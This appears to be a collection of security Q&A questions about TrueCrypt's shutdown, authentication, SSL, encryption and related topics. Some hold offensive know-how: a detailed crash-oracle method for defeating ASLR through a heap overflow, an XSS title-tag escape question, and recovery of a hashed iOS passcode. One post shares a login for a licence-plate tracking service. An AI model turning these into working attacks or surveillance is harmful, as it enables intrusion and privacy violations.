Client uses AT to authenticate all subsequent HTTPS traffic.
(And we should probably use separate key pairs for encryption and signing, but let's ignore that for now).
As far as I can see, this is secure against eavesdroppers (as they won't have SK) but if a malicious attacker can modify the HTTP request, there is nothing stopping them from generating their own symmetric key instead of SK, encrypting it with PK, replacing the request payload with that and the server will have no idea that it's not talking to the real client. The server will then happily encrypt a valid AT and send it back to the attacker who can then proceed with impunity.
Is there a way to shore up this hole? Is it even possible to do this with a stateless server?
EDIT: if the server can detect tampering and abort the authentication process, that would be sufficient. "This is not possible because X" is also a valid answer, if it can be demonstrated.
|
Is it possible to trace the source or destination (location, even coordinates) of an SMS message ?
If it is, is it possible to do it even if the phone is roaming in a different country ?
|
1.4 install personal firewall software on any mobile and/or employee-owned computers with direct connectivity to the Internet (for example, laptops used by employees), which are used to access the organization’s network.
If company employees have their own mobile devices that don't connect to the internal network however they do connect to an internet facing company mail server using encryption. In this case does this apply? How about for company owned phones with the same setup?
My thinking is that neither employee owned nor company owned phones would apply as long as there's no cardholder data in their email that would get stored on their phones. Any clarification on this would be greatly appreciated.
|
I have several clients that are having trouble logging into vendor's web service. When talking to the vendor about the issue, they told me to set them up with Chrome running in Windows XP compatibility mode. This is how they want the client to change the compatibility settings:
I have some reservations about this fix workaround, given that Microsoft does not support Windows XP anymore (unless you pay for it). Can running a browser in Windows compatibility mode be a security issue?
|
We have several applications that leverage AD
SAML (via Ping Federate)
LDAP authentication from 3rd party applications
Windows workstation / Exchange auth (Kerberos)
IIS and web components (su4user, impersonation, etc)
I have never deployed 2 factor auth in an AD environment and remember reading that RADIUS was leveraged in a way to accommodate many if not all of the scenarios above, with minimal impact to the end users.
Can anyone explain the infrastructure that is needed for a private corporation to deploy 2FA to their AD Forest, and allow 3rd parties (such as Salesforce, Dropbox, Office 365) to leverage that authentication?
|
How can find the efficiency of any biometric system is there an equation to find it?
How is the efficiency of a biometric security system?
|
From what I understand, when you send information to a website over SSL, you encrypt the information you send with their public key.
However, if you want to be able to decrypt the information they reply with, you are going to need a private/public key combination yourself. I don't ever recall having been prompted for an RSA key by my browser, or been required to generate one; where does this key come from?
If your browser creates one for you, is it generated once and then stored on your computer forever, or is a new key generated for every session or site?
|
The wonderful answer to the question "What can an attacker do with Bluetooth and how should it be mitigated?" suggests that frequently re-pairing Bluetooth devices is a "good idea™."
Are there any Bluetooth pairing sequence attacks such that it would be advisable to avoid pairing Bluetooth devices in public places? Or can I generally feel safe re-pairing my phone with a headset or a keyboard in public?
|
I'm trying to understand how this user impersonation might have taken place. Here's the scenario:
Our controller got a call from our bank this morning about a suspicious wire transfer request. After some back-and-forth with the controller and with the bank, we've established that this is what happened:
Somebody sent an email to the bank requesting a wire transfer using an old domain of ours: joe@olddomain.com. This is an old domain that we used to use for email and which we still own. Email service is still set up for this domain, however all email address have been replaced with aliases that forward email to addresses at our new domain.
The bank replied with instructions & a form to complete.
The bad guy sent back the form, completed and signed, from a hotmail address. The bank may also have spoken to the bad guy - that's not clear to me (since I'm getting the information second hand).
The bank called us (at our phone number on record) to confirm the transaction.
The question I have is this: how did the bad guy get the email which the bank sent? We have checked the logs for both our email systems (both old and new) and there are no recorded visits from any unusual IP addresses.
I think it was a simple "reply-to" header on the original email, and the person at the bank didn't notice that the reply was being sent to a different email. But shouldn't the bank have something in place to alert the user if the "reply-to" address is different from the "from" address?
My co-worker thinks the only other possibility is the bank's DNS record being hacked to redirect outgoing email. That seems highly improbable to me - is it possible that the bank's DNS record was hacked?
Finally, are there other ways for this to work?
|
The official TrueCrypt webpage now states:
WARNING: Using TrueCrypt is not secure as it may contain unfixed security
issues
This page exists only to help migrate existing data encrypted by
TrueCrypt.
The development of TrueCrypt was ended in 5/2014 after Microsoft
terminated support of Windows XP. Windows 8/7/Vista and later offer
integrated support for encrypted disks and virtual disk images. Such
integrated support is also available on other platforms (click here
for more information). You should migrate any data encrypted by
TrueCrypt to encrypted disks or virtual disk images supported on your
platform.
with detailed instructions for how to migrate to BitLocker below.
Is it an official announcement or just a tricky deface attack?
|
I have a web application where (among other things) customers can upload files and administrators can then download those files. The uploaded files are stored on ServerA and the web application used to upload/download those files runs on ServerB.
I would like to make it so that while the files are stored on ServerA they are encrypted and that only the web application can encrypt/decrypt, but my concern is that there might not be an effective way to store an encryption key, which would make the file encryption mostly for show.
I came across this question/answer which suggested some good ways to securely store a key, but I think that the most secure ones do not apply since I need different people to be able to decrypt the file.
For example, I cannot create a key based on user credentials, because customers must be able to encrypt all admin users must be able to decrypt (right?).
From what I can tell, my best option is to store the encrypted files on one server and store the encryption key in the code on my web server, but this does not seem particularly secure. It seems likely that if a malicious user gains access to one server they probably gain access to both.
My question - is it even worth implementing "encrypted files on ServerA" and "encryption key on ServerB", or would I just be kidding myself to think this is more secure? Is there an effective way to encrypt files based on the conditions that I laid out above?
|
I read an article from CSA that they rank service traffic hijacking as the #3 threat to cloud-services. Why is it worse for the user if an attacker hijacks its service traffic on cloud? What new exploits can the attacker take advantage of in a cloud-service compared to before?
I had a hard time phrasing this question so if anything is unclear please ask.
|
A typical strategy for defeating ASLR is to find both a buffer overflow bug and an information disclosure bug. But when attacking servers that are automatically restarted whenever they crash/die, is a buffer overflow bug enough? Can we use that buffer overflow bug to also give us the information disclosure capability?
Let me flesh out the scenario. Suppose I have a server program that processes a request from the network and will be automatically restarted on a crash, and suppose I have found a buffer overrun vulnerability (of a heap-allocated buffer B) in the server that I can reliably exploit by sending an appropriately crafted request to the server. Suppose also that I can detect when the server crashes (e.g., it might crash because I sent it a request that corrupted its memory and caused it to segfault; in any case, assume I can send it a request of my choice and determine whether it crashed or not while trying to handle that request). The server is using ASLR, and I want to derandomize ASLR so I can mount a code injection attack, but I don't know of a separate information disclosure bug -- the buffer overrun vulnerability is all I've got to work with.
Can I use this buffer overrun vulnerability for information disclosure, to learn the contents of memory after B?
Here's an example of the sort of attack I am imagining:
Suppose that the overflowable buffer B is 512 bytes long, and suppose there is a secret 8-byte pointer P stored immediately after B. Suppose field F of the request is copied byte-for-byte over B without any length check.
If I send a request with a 513-byte value for F, that'll be copied over B. If the 513th byte of my value differs from the first byte of P, then the value of P will be corrupted, and (assuming the program later dereferences P) then program will probably crash during processing of this request. On the other hand, if the 513 byte of my value matches the first byte of P, then P will remain unchanged, and the program will probably not crash.
So, I can imagine sending 256 requests, each with a different value for the 513th byte of field F; if 255 of them cause the server to crash and one does not, then I immediately know the value of the first byte of P. Now I can continue until I learn each of the bytes of P. This might be useful if the program is using ASLR: by learning the value of the pointer P, I can derandomize part of memory.
This is just a simple example. In practice, I would imagine there might be unused space after the end of B and before the next object stored in the heap, but you can imagine ways to adapt these techniques to deal with that situation as well (e.g., if the byte after B is unused, then you can overwrite it with anything and the server won't crash, so it's easy to detect locations that are unused, and continue the attack until you find the next object after B).
Does this attack work in practice? Does it provide an effective way to defeat ASLR, when you have a heap overflow in a server that's automatically restarted and when you have a way to detect crashes?
Are there any hurdles that I've overlooked that prevent this from working? For instance, I can imagine that if memory allocation for objects in the heap were non-deterministic and random, the attack would fail; but do platforms do that? Are the relative offsets between objects in the heap deterministic in practice, if you run the same program twice on the same inputs?
I am assuming that the buffer overflow allows overwriting B with arbitrary binary data that's totally under the attacker's control. (The attack won't work with a strcpy() or string-related overflow, since then the data is forced to be nul-terminated.) Also, let's assume that either the server is re-started using fork(), or for some other reason, part of the memory layout is the same each time the server is restarted. (For instance, this automatically holds on on Windows and Mac, since libraries are at the same base address every time you restart the server, and it holds for non-PIE processes on Linux.)
Credit: I am inspired by a method I recently read about for exploiting a buffer overflow bug of a stack-allocated buffer for information disclosure purposes. This was described in the Blind ROP paper recently published at IEEE Security & Privacy 2014. They show how to do it when the buffer B is allocated on the stack. In this question, I am asking whether their technique can be generalized to the case where the buffer B is on the heap.
|
I want to create my computer passwords with a RNG, but I am thinking about one thing: I would use python to write that script and the RNG is controlled by one seed, most likely the time. If I would generate my passwords with a RNG that is seeded with the time and someone knows about it, he could try to brute-force the generated passwords by using the time when I possibly created the passwords.
To put it short, in my opinion time is no good seed for a RNG if the output should stay secret, but what are good seeds for an RNG? I already heard of ideas like reading allocated memory (if it was just allocated, it should contain random bytes), using the current PID or using the last bits of the mouse cursor position. Which of these ideas (or other ideas) is really complete random?
|
I don't trust BitLocker. Probably backdoored and relies on TPM which can be hacked according to DEFON. It also does not allow for hidden partitions or other advantages like TrueCrypt.
With TrueCrypt and the state that it is in, are there any other open source options that can be trusted and not backdoored?
|
I am planning to use JSON as the data transport mechanism between my iOS app and my server (the server is a WCF service). While learning about JSON, I realized that all the data is passed around directly in the URL. I am sure this question gets asked a lot but I was not able to find anything concrete on the site.
Is there an alternative to sending JSON data directly in the URL?
If not, how do I secure it? I should be able to prevent everyone other than the app from requesting or sending data to the service. One way to do this to be put a 'key' as part of every request; one that is known only to the app and the server. This way I could reject all calls without the correct key. But what is to prevent someone from sniffing the data and forging a request?
Will SSL help here? If I have an SSL certificate, will it automatically encrypt all data to and from the app?
I am sure this is a very common scenario so I am looking for the most elegant way of solving this problem.
|
I'm made a small web service that gets urls, download them, and convert them for another format. Most of those urls are documents (doc, docs,...). Basically, I'm open them with MS-Word and convert their type.
Another critical assume is that my server will meet, in some day, an infected file within the given urls.
Now, I'm wondering how I'm can secure my machine from infected files attack? How I'm can detect it after it done?
I'm thought to run MS-Word with limited user. Not have success yet... but maybe i'll in the further.
What else I can do?
|
From what I understand, the certificate authorities (CAs) have to get their root certificate included in the browser.
What if the root certificate of a particular CA is not included in the web browser yet. Is there another way to get it in?
Maybe my question is not clear enough. The question shoud be : in a PKI hierarchical model, if subCAs have not root certificate include in web browser then how subCAs can get in?
|
Many people who live outside the US use "DNS unblockers" such as Unblock-Us to access region restricted services such as Netflix and Hulu. My understanding of these services is that for DNS requests to blocked services it instead returns an IP for one of their proxy services.
Netflix is approximately 5 times cheaper than the cheapest "pay TV" service in my country, so obviously DNS unblockers are a very attractive proposition. On the other hand, using DNS servers from some little known company is a huge risk! Obviously TLS provides some protection, but I'll acknowledge that I'd most likely fall for an SSL stripping attack for example.
My question is: What options are available to make these unblocking services less of a risk?
Currently, I have to set it as the default DNS service on my router because some of my devices don't have customisable DNS settings – however I override the DNS settings on my PCs to use Google's DNS or my ISP's. This would mitigate the risk somewhat, but it obviously doesn't help on devices that I want to use both Netflix and perhaps also access sensitive services, such as my iPad.
I was thinking I could perhaps set up my own DNS server (I have a media/file server on 247) which proxies DNS requests to say Google DNS ordinarily but uses my DNS unblocker for Netflix related requests. I'm not sure how to go about this, or how I might be able to determine what domains need to go to the unblocker.
|
I am having trouble finding out if a potential server configuration is secure. I have a server running a nginx reverse proxy that is accessible from a public ip address on the ports 80 and 443. I then have a private network that is internal to the machine nginx is running on with a 172.17.%.% address that only the machine can access. They are linux containers.
Is it secure to do a ssl connection to the reverse proxy then regular http to the containers running on the 172.17.%.% network as it is internal to the machine.
|
This has become a bit of a thought experiment for me.
Suppose someone would like to establish a pseudonym along with a corresponding PGP Key, how could other people verify the correspondence between the name and the key?
Generally, PGP keys are for real people, whose identity can be verified IRL, but that does not apply here.
My first original thought was that the pseudonym could be a name based on the key fingerprint, but then, depending on number of characters, it could be quite easy to generate a new key that also meets this requirement.
Could there be a strategy (potentially more social then technological) for someone to verify this correspondence?
Edit:
The potential purpose for a pseudonym with this requirement could be along the same lines as Satoshi Nakamoto, or a whistle blower. Wanting to constantly release documents or software that is verifiably from the owner of the pseudonym.
|
I have an c/c++ program used for encrypting data for communicating between two ends. Encryption is done using OpenSSL (0.9.8d-fips, Sep 2006). Think it'll be worthy to mention that I'm not much familiar with using OpenSSL.
The program works fine for larger packets. But the size overhead is very high when encrypting smaller size packets. I've done a test to demonstrate the issue.
+-------------+-----------------+-------------------+
| Input Chars | Encrypted Chars | Input/Encrypted % |
+-------------+-----------------+-------------------+
| 1 | 74 | 1.351351351 |
| 2 | 74 | 2.702702703 |
| 3 | 74 | 4.054054054 |
| 4 | 74 | 5.405405405 |
| 5 | 74 | 6.756756757 |
| 6 | 74 | 8.108108108 |
| 7 | 74 | 9.459459459 |
| 8 | 74 | 10.81081081 |
| 9 | 74 | 12.16216216 |
| 10 | 74 | 13.51351351 |
| 11 | 74 | 14.86486486 |
| 12 | 90 | 13.33333333 |
| 13 | 90 | 14.44444444 |
| 14 | 90 | 15.55555556 |
| 15 | 90 | 16.66666667 |
+-------------+-----------------+-------------------+
The test was done while incrementing the number of input characters from 1 to 10000 . Following graphs illustrate the results more clearly.
Graph 1: Encrypted size vs Input Size
Graph 2: Ratio vs Input size
From the second graph, it's clearly visible that the encryption overhead is very high for smaller inputs (size less than 300bytes).
Is this normal/acceptable? If it is so are there any alternatives (with less overhead). Because the application uses smaller packets heavily (Bundling them together is not an option).
As mentioned above, OpenSSL 0.9.8d is used, which is a bit older version (1.0.1g, April 2014, is available now). Will the problem be fixed if I upgrade it?
|
i play an android game which seems to send the player's high score in an encrypted format .
some thing like (f11cca35236eebbdc26a0ce45876d117)
a 32 character code
tried MD5 but no result found.
i wanna know is there any way i could decrypt it or at least find the encryption method?
thanks
|
In light of the current fiasco surrounding TrueCrypt, I have received considerable criticism from current clients and peers in the IT industry for my continued support of the open-source model. Such criticism is usually lumped in with ongoing dialogue on the virtues and failures of the open-source model following episodes such as heartbleed. I have attempted to point out that in spite of many news articles labeling TrueCrypt as open-source, the source-available label found on Wikipedia is more correct.
It conjunction with that distinction, I have argued that having the source code available for review is inherently more secure than not, but that it should not suggest the same level of trust as a project that follows an open-source development model including allowing redistribution of modified work. While my gut tells me this is a reasonable position to take, the difference is subtle and my ability to communicate it convincingly is limited.
Are there more concrete evaluations to go on than just my gut here? Is there a measurable difference in the relative security of source-available applications vs true open-source counterparts? If so, is it well established what factors exactly contribute to this? What about the OS development model specifically results in more secure code than just releasing code for review? Or does this boil down to opinion in the end?
Edit: does it make any difference whether the specific software in question is cryptography related?
|
I'm playing with adfs, and I'd like to store credentials in a session context during my questioning of the user. So, my question is, is it safe to store sensitive data in a session context?
Thanks
|
In a weird announcement on the TrueCrypt page it says that the software is unsafe so we should migrate to BitLocker.
If it is a prank it's sure not funny especially when it comes to data.
Since I want to switch to Linux as my primary OS, I was thinking about Encrypted LVM.
Is this secure just as TrueCrypt full-disk encryption ?
Is it susceptible to cold boot attacks ?
Are there any holes that can allow data recovery ?
Please shed a light on this topic because I bet the TrueCrypt message today raised a
lot of panic.
|
Unfortunately, TrueCrypt may have been discontinued yesterday.
I use LUKS on Linux, but I liked the fact that with TrueCrypt I had a portable solution across Windows, Mac, & Linux.
TrueCrypt has its own license, but it was Open Source. Are you aware of any reasonable fork of TrueCrypt or any other portable alternative?
Goals:
encrypt portable USB disks and flash drives
mountable at least on Linux and Windows (MAC is a plus)
easy setup (no need to recompile tons of stuff)
|
We are a medium sized company. Recently, one of the representatives of the finance department raised a question about the use of credit cards to shop on-line among different departments in our company.
His concern relates to cases when a person from Department X requests to make a purchase from a site directly from his/her office computer. The reason for doing so is having direct access to some sensitive data needed right at the moment of purchase.
Currently, a finance representative walks up to the employee's office and provides the CC number.
Obviously, the risk comes from the stored CC information under that session associated to the user profile in the on-line store. Several risk scenarios rises like this if the user accidentally makes more purchases with that CC information, if that information is leaked, or if the user account is compromised.
We have proposed solutions such as using pre-paid credit cards, Verified-by-Visa, or safetypay, which requires accepting purchases (Finance Dpt) by someone else after submitting a purchase order (Dpt. User who purchases). However, not all online stores accept these payment methods not even Verified-by-Visa.
Alternative solution is to make the purchaser sign a form where Dpt. X accepts all the responsibility derived from the use of this corporate credit card. Nevertheless, we think this measure lacks the prevention factor an information security strategy must embrace.
Any help?
|
I was using TrueCrypt until recently, until one of two options has happened: either it was discontinued or its web-site truecrypt.org was hacked. Any option implies that I don't trust it anymore.
So I'm now looking for encryption that is both convenient (just drag and dropping a file into a container) and secure (in the sense that a Russian hacker won't break it).
No need to encrypt the whole HDD, nor individual encryption per file, but a volume encryption.
How can I tell which software is reliable, to avoid a repeat of the TrueCrypt mishap?
|
So I am interested in computer security, cryptography and security protocols. Thing is, everything I read is about theoretical usage of protocols, but how do those things work in real world?
Is there a book or paper that I can read and understand how everything works practically. Like how everything is implemented programically, not just on paper? I am not talking about implementation of cipher itself programically, but how everything works together? Let's say I login to internet banking and lot's of stuff happen automatically regarding encryption, sessions, etc., but how can I see real world example of what is happening there?
|
I'm working on a mechanism to better handle group policy passwords in response to MS14-025. We formerly used this mechanism for setting the local admin account passwords on our workstations (primarily Windows 7)
To this end (see the method I've outlined below for specifics) my thought is to have these changed client side via a scheduled task and save the resulting password to a restricted access network drive. What kind of exposure am I creating by allowing these changes to occur locally, instead of pushing out from a central location?
The only thing I've come up with are memory scrapers and the ability to manipulate the random number generator.. Both of which should require admin rights already.
Background
Goals
Avoid storing plain text passwords in a GPP item.
Rotation on these passwords
Set unique password per device (avoid pass the hash attacks)
Proposed Method
Set up a scheduled task (deployed by group policy preference, using the system account)
Schedule monthly / quarterly / whatever
Run on local Admin login, after 30 minutes
Task runs executable / script which will
Set the admin password to a random string
Save password to a network directory, using computer name for reference
Enable auditing / restricted access rights / etc on this folder.
Combined with a secondary trigger - say 30 minutes after the local admin account is logged in to - and we'd have a pretty decent method for controlling these accounts with the additional benefit of knowing whomever is using the local Administrator account.
|
Specifically, why are the most popular attack proxies written in java? Is there any particular security posture to the design of the java language that makes writing tools like these simpler? Easier to maintain and update?
|
Many websites, including banks, use text messages as their primary or secondary means of authentication. In theory, it sounds like a perfect method unless the user loses their phone or has it infected with a virus.
However, are there any known attacks on text messages that don't rely on access to the actual phone? Is it perfectly safe to rely on text messages as an authentication method?
|
Given KeePassDroid, I'm considering some of the security implications of accessing KeePass databases on an Android device.
In the native applications for Windows, OSX, and Linux, whenever the database is locked or exited, the password is erased from memory by filling its location with zeroes.
Since Java itself does garbage collection in a different manner, is there a real, tangible concern over storing passphrases in memory in the JVM? How about in Dalvik for Android?
Other than setting this.password = null;, what can be done to ensure that the passphrase has been securely erased from memory?
|
Does DANE offer the ability to provide certificates for services? Or is it just hosts?
How does one specify a mail server with DANE? If my email is jd@foo.com but mail.bar.com is the email server, then do I publish mail.bar.com for the foo.com domain? Here, mail.bar.com may be operated by someone else (in my case, its my server but my mail server is home to three domains).
|
I wonder why countermeasures against code-injection and control-flow hijacking attacks (e.g. stack-based buffer overflows and heap-based buffer overflows) are mostly implemented in software.
Examples of popular and widely deployed countermeasures are:
- ASLR
- Stack canaries
- Non-executable memory regions
But why exactly are these countermeasures not completely implemented in hardware, or at least supported by hardware? Since nowadays reconfigurable hardware (e.g. FPGA's) is affordable, this approach seems perfectly possible to me.
Or do hardware-based countermeasures exist? And if so, can anyone give me some examples?
|
I am taking a web security class and was told by the instructor that most of the websites today use https for authentication and then use a cookie (authentication token) in plain text to keep track of the user.
I wanted to confirm this. For example, when I use Amazon.com, if I logged in before, Amazon shows something relevant to my history. For this they must be using a cookie. But when I click on Account, a https page is opened. If I am looking at my account details, why would Amazon choose to send a cookie (acting as an authentication token) in plain text ? If I can listen over the wire, can't I just steal the cookie and hijack someone's session ?
My hypothesis is that websites like Amazon have multiple cookies, some are for pages that don't need https (like the home page), but still want to keep track of user history; others are for tracking if user authenticated previously (so user doesn't need to type password again), and this type of cookie must always be sent over https.
Can anyone confirm my hypothesis ? (I believe my instructor might not be entirely correct)
|
Transaction Data Signing
I need an idea to develop a very secure algorithm to authenticate online operations using PHP in the server and an Android app in the user's device.
What is the idea?
The user try to login in the system. The server sends a confirmation request to user's device (Android).
The user sees the date, country, city, IP, browser and OS in the app, all about the login try, and if all this informations match, he can clicks on confirm. The app will generate an 8 decimal digit token based in this informations and send it to server, the server will try to generate a token with the same informations and if both tokens match, the server accept the login try.
This is just one possible operation.
What do I need?
An universal algorithm to authenticate any online operation.
e.g.:
function generateRandonTokenUsingNParameters(){
$args = func_num_args();
$token = ""; //Start token
for($i=0; $i < $args; $i++){
$token = CRAZY_MATH_USING_ALL_PARAMETERS_TO_GENERATE_8_DIGITS_TOKEN($token, func_get_arg($i));
}
return $token; //Final token based in all informations of the operation
}
//e.g.
//LOGIN INFORMATION
$date = "2014-05-30 01:02:00"
$ip = "192.168.0.1";
$browser = "Chrome";
$city = "Los Angeles";
$country = "USA";
$os = "Windows";
$android_app_local_seed = "698dc19d489c4e4db73e28a713eab07b"; //each user have a different seed in his app
//PRINTING LOGIN TOKEN
echo generateRandonTokenUsingNParameters($date, $ip, $browser, $city, $country, $os, $android_app_local_seed);
What would you use in the CRAZY_MATH_USING_ALL_PARAMETERS_TO_GENERATE_8_DIGITS_TOKEN() function?
P.S.: I need an 8 decimal digit numeric token.
Because if the user does not have internet connection, he can read the operation's details using QR Code and he will need insert the token in the system manually.
|
A friend shared a "security service" he just read about. Apparently the product is in beta and can thus be tried by anyone right now. I found it very interesting and surprising. I'm curious to know who provides the license plate photos for this product and what legal implications exist with this sort of thing. The service can be found at
https://learn-nvls.com/learn/gui/index.aspx?ProviderType=NormalProvider
for the username: stakeout
password: beta
Entering any valid license plate will return photos of that vehicle both on public and private property as capture by both private and public agencies (e.g., toll cams, traffic cams, police, et cetera). The app also shows metadata regarding each photo such as location and a time profile for when the vehicle is at a certain address.
Thanks for sharing thoughts and answers,
TJ
|
I have a web application that runs on localhost. I have a self-signed certificate for tomcat configured but when loading the website on firefox, I get a security exception. Can I get a CA to sign my SSL certificate so that this error is not thrown?
|
I'm developing Medical Billing & EHR Software. On completion we are planning to use AWS for hosting and thus provide SAAS.
Do we need to encrypt the MySQL database in order to keep HIPAA compliance? I'm aware of HIPAA requirements for data at rest but I don't know how it applies to Amazon Web Services.
|
My understanding is that, typically websites are recommended to store only hashes of passwords using one-way cryptographic hash function. This way, there is no way to retrieve the passwords even when somebody can hack the database.[1]
On the other hand, financial management website Mint requires you to enter bank login information. Presumably they use this to access the banking information, so they would have to be able to store the password in a way that can be retrieved. Yet, most reviews that I read consider Mint safe[2]. How can it be safe, while adhering to a less secure practice of storing bank passwords than a typical website?
[1]For example, see Why is 3DES not used to store passwords?
[2] For example: Is Mint Ready for Your Money?.
|
I want to create a dual-boot such that the content of each OS is separated from the other using encryption. The main point point would be to to test out potentially harmful software on one OS, and still be able to rely on the integrity of the other OS.
User A uses OS A and User B uses OS B. Lets assume:
both OSes are Windows 7.
two different partitions, one for each copy of Windows.
one physical storage unit available such as on a laptop
users of each OS both want to brute force (not vs each others) using attached hardware or use third-party software involving card readers
it is acceptable for each user to be able to destroy each-others Windows by erasing or over-writing a partition.
However neither user should be able to access or modify plaintext data from the other user's partition.
In the past I have arranged this with TrueCrypt and Hidden OS. I am looking for other ideas that are easy to implement and, more important, don't take a lot of time. I would prefer an arrangement that included only open source software.
Is this possible? If so, how?
|
I have a website and hosted some data and MySQL files on it. Is it possible for me to install an intrusion detection system on it, or can IDSs only be installed on my internal network where I have a router?
|
I've read numerous articles about using HMAC and the secret key for client authentication in a RESTful client (Javascript) application today.
Still, I don't find a single source that is able to transparently explain to me a process that fills the security gaps in the theory.
The secret key is supposed to be secret, which means that only that specific client and the server should know about the key.
Since the secret key should not be transferred over the network, it should be sent over a secure medium such as email. I will not use SSL/TLS, so sending the secret key as a response from the server at login is not an option.
When questioning security, it makes no sense to me.
The only reason why the user would access his email for my application, would be on registration (to activate the account).
My first thought is that a cookie is not safe, but is there another way to store the secret key on the client?
When the user clears his cookies, the secret key is lost. It doesn't feel very logical to send another email with a new secret key every time the cookies are gone, that wouldn't make any sense to the user.
The user will use multiple clients, and a separate secret key should be generated for each client. Setting the key on registration does not sound like an option.
The only thing that would make sense to me is that the client gets its hands on the secret key when the user logs in, as there is no reason to keep the key when the user logs off (or after a certain expiry time).
So the question is easy:
How does the user get the secret key at login, and where is it stored
at the client so that it is safe?
I feel a bit surprised that I cannot seem to figure this out.
Lots of answers on the same question seem to beat around the bush, but never hit the sweet spot that makes me understand.
Edit:
After another day of research, I can only conclude that an SSL connection is really required. I just can't see it any other way.
Anyway you put it, the secret has to get to both the client and server.
If this is true, I don't see why so many websites and blogs I've read point to using HMAC as alternative for Basic Auth + SSL. If there is no transparent way to share the secret key between server and client @ login time, then for me there is no use in using HMAC at all.
I find this a pity, as in the RESTful environment, every request sent to the server requires to be authenticated individually.
My application is supposed to send a lot of requests to the server for an hypothetical high amount of people, I am afraid for the overhead that SSL will cause.
Do correct me if I see this wrongly.
|
With their iOS devices, Apple allows people to block certain applications through "Restrictions". I recently had an issue with my iPhone where I'm positive that I entered the correct passcode on my new phone, but the device refused to give me access. Searching around online shows LOTS of other people claiming the same thing.
I'm wondering if it's actually a bug, or whether we're all just forgetful.
The passcodes are stored in an XML file. Mine was this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>RestrictionsPasswordKey</key>
<data>
PKu5mw2c2qFkynodAj9rc07KQ+E=
</data>
<key>RestrictionsPasswordSalt</key>
<data>
EPHEAw==
</data>
</dict>
</plist>
Through editing the file and making changes, I can confirm that the following
Key: IxxWEBikzuZi33zUqCBnAcWAavk=
Salt: aSbUXg==
Equals passcode: 1234
Given that each passcode is only four digits, how can I decrypt my initial passcode to see if it really was what I remember it being, or if I had misentered it the first time around.
|
There is no doubt in my mind that spaces should be allowed in passwords. I see some websites disallow spaces, symbols in passwords and even enforce minimum length which seems t
otally nonsensical to me.
Normally I'd check that user passwords contain:
minimum of 6 characters
Upper case letters
Lower case letters
Numbers
Symbols
Here's my question:
Which of these categories should space fall under? Can I count it as a symbol? Or is it in it's own category adding nothing but length to the perceived complexity of the password?
Counting a space as a symbol would allow the following password:
"Ab1 "
Which frankly does not look safe so should I allow the spaces to count as symbols? (and do they add enough complexity to the password to be counted as symbols?)
This is the JavaScript function that I'd usually use to check passwords but given the above password this function will return false, deeming it insufficiently complex.
function checkPassword(password) {
if (password.match(/[A-Z]/)
&& password.match(/[a-z]/)
&& password.match(/[0-9]/)
&& password.match(/[£:#@~\.,|(etc....)]/)
&& password.length >= 6) {
return true;
} else {
return false;
}
}
|
I am trying to find out whether this is vulnerable against XSS: I can control the content of the title tag through the URL. This would make the site vulnerable if it wasn't for the fact that the site only takes the text until the first forward slash appears, making it seemingly impossible to close the title tag. I already tried %2F, but the server appears to convert that to a forward slash and therefore cut the input there. This is possibly mod_rewrite, but without AllowEncodedSlashes.
Example: domain.com/subfolder/myXss</title>bla will lead to ...<title>myXss<</title>
So my question is whether one of these two is possible:
Can i encode a forward slash in some other way?
Can I somehow close the title tag or insert malicious code into the title tag? I can't simply insert script, as nothing else is allowed within the title tag.
|
Since a few days, the Sourceforge project page of TrueCrypt is displaying a message saying:
WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues
And, the authors are even encouraging users to switch for Microsoft BitLocker program. The press did a lot of comments about this change:
TrueCrypt considered HARMFUL – downloads, website meddled to warn: 'It's not secure' (TheRegister).
Bombshell TrueCrypt advisory: Backdoor? Hack? Hoax? None of the above? (Ars Technica).
Snowden’s Crypto Software May Be Tainted Forever (Wired).
... and so on...
A fork of the project even appeared on a Swiss website.
So, what is really happening ? What are these security issues in TrueCrypt ? What kind of security risks can be expected if we are keep using it ?
|
Question
Standard security advice is:
Only download files from websites that you trust.
http://windows.microsoft.com/en-ca/windows/downloading-files-internet-faq
This implies that 1. we are active agents when downloading files from websites and 2. websites cannot download files to our computer without our interaction.
So, let's say I am using Firefox. I go to a sketchy website. Can that website download malicious content to my computer without my interaction or awareness?
Optional Context
I know that web browsers render content on my computer when I surf the web. In one sense then, they are always "downloading" stuff to my computer. Most of that stuff I don't consider to be a download, though. Even streaming videos, while they may cache content, are not downloads in this sense, and I assume these non-downloads do not pose a security threat.
By download, I am talking about what, by default, appears in the Downloads folder of my Windows computer. Usually, I have to click a download link, confirm that I want to save/open the file, and then watch the Firefox download progress. The downloaded file appears in my Downloads folder.
As such, I have given the download permission, I am aware as it is happening, and I can see evidence after it has happened, because it is in my Downloads folder. Further, I have to open the download before it runs. It's an interactive procedure.
Result: I feel safe on a sketchy website, if I do not initiate or accept any downloads. Am I misguided? Can downloads from websites happen without my interaction or awareness?
without my clicking a link on a website
without my giving permission to save/open the file
without the Firefox download progress indicator showing a download, and
without the download appearing in the Downloads folder.
|
I attended B-Sides in Orlando FL where one of the speakers had mentioned a site which contains hardened configs for popular services such as apache and postfix. The author of these configs is anonymous and although he doesn't claim to be an expert most would agree his configs are pretty locked down. I want to say it's "clipso" something but I'm not entirely sure.
Does anyone happen to know this source, or another good source which has hardened base configurations. I'd like to use these as a "wide-net" starting point to hardening some servers.
|
Watching the Snowden interview last night, Brian Williams asks him what degree of control the NSA has over smartphones -- in particular, whether or not they can remotely turn them on in order to collect data. Snowden replies "Yes" and goes on to say some scary things about the kinds of data that government agencies can collect.
I've never heard of this before. What kind of mechanism would facilitate this? Do iPhones have some kind of wake-on-LAN feature? Is this an actual feature which is well known, or conjecture by Snowden? I see this question provides concrete evidence in the case of smart TVs in addition to some hazy assertions that "anything is possible" -- has such a thing been demonstrated to exist?
|
I've been getting the weirdest email messages for the last 2 days on my personal gmail inbox.
On May 28th, exactly at 4:33 pm BRST I got about 2,000 emails that look exactly the same, here's the original.
Delivered-To: XXXXXX@gmail.com
Received: by 10.58.195.142 with SMTP id ie14csp9116vec;
Wed, 28 May 2014 17:23:56 -0700 (PDT)
X-Received: by 10.194.48.80 with SMTP id j16mr4624897wjn.44.1401321530931;
Wed, 28 May 2014 16:58:50 -0700 (PDT)
Return-Path: <482265052@attacker.com>
Received: from WIN-EB12TG1C3GU ([212.68.146.41])
by mx.google.com with ESMTP id hl6si35599364wjb.55.2014.05.28.16.58.50
for <XXXXXX@gmail.com>;
